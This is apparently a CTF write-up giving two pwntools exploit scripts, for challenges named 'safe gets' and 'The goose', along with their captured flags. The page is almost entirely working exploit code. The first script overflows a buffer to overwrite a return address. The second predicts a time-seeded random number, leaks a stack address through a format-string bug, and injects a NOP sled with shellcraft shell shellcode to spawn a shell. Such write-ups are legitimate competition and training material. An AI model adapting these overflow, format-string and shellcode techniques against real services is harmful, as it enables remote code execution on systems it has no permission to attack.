dplastico

safe gets

Cool challenge

#!/usr/bin/env python3

from pwn import *

elf = ELF("./chall_patched")

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hl', '130']
#context.log_level = "debug"
gs = '''
b main
continue
'''

def start():
    if args.REMOTE:
        return remote("34.45.81.67", 16002)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================

def rstring(s: str) -> str:
    return s[::-1]

jaja = "💀"

payload = "A"*0x28
payload += (p64(0x6a12400000000000)).decode('latin1')
payload += "C"*0x10
payload += "\x00"*8
payload += jaja*0x40

print(len(payload))

log.info(f"payload len() = {len(payload)}")

sl((rstring(payload)))

#L3AK{6375_15_4pp4r3n7ly_n3v3r_54f3}

#========= interactive ====================
r.interactive()

The goose

Very creative challenge :)

#!/usr/bin/env python3

from pwn import *
import time
import random

elf = ELF("./chall_patched", checksec=False)

context.binary = elf
context.terminal = ['tmux', 'splitw', '-hp', '70']
#context.log_level = "debug"
gs = '''
continue
'''

def start():
    if args.REMOTE:
        return remote("34.45.81.67", 16004)
    if args.GDB:
        return gdb.debug([elf.path], gdbscript=gs)
    else:
        return process([elf.path])

#r = start()

def rcu(d1, d2=0):
  r.recvuntil(d1, drop=True)
  if (d2):
    return r.recvuntil(d2,drop=True)
libcbase = lambda: log.info("libc base = %#x" % libc.address)
logleak = lambda name, val: log.info(name+" = %#x" % val)
sa = lambda delim, data: r.sendafter(delim, data)
sla = lambda delim, line: r.sendlineafter(delim, line)
sl = lambda line: r.sendline(line)
bc = lambda value: str(value).encode('ascii')
demangle_base = lambda value: value << 0xc
remangle = lambda heap_base, value: (heap_base >> 0xc) ^ value

#========= exploit here ===================

while True:
    ts = int(time.time())
    nhonks_list = []
    c = 0
    for delta in range(-40, 41):
        random.seed(ts + delta)
        nhonks = random.randint(10, 100)
        nhonks_list.append(nhonks)

    for nhonks in nhonks_list:
        r = start()  # reconecta cada vez
        #r.timeout = 1
        sla(b"> ",b"AAAAAAAA")
        sla(b"honks?", bc(nhonks))
        try:
            c += 1
            log.info(f"Try #{c}")
            res = r.recv(timeout=1)
            if b"wow" in res or b"what's your name again?" in res or b"leave to the world?" in res:
                log.success(f"Encontrado nhonks = {nhonks}")
                payload = b"%p-"*12
                payload += b"%p"
                sl(payload)
                leak = int(rcu(b"wow ","-"),16)
                logleak(f"stack leak", leak)
                payload = b"A"*0x178
                payload += p64(leak+0x60) #to land in the stack
                payload += b"\x90"*0x20
                payload += asm(shellcraft.sh())
                sla(b"to the world?", payload)

                r.interactive()
                exit(0)
        except EOFError:
            r.close()
            continue
        except Exception:
            r.close()

    time.sleep(1)
#========= interactive ====================
r.interactive()
#L3AK{H0nk_m3_t0_th3_3nd_0f_l0v3}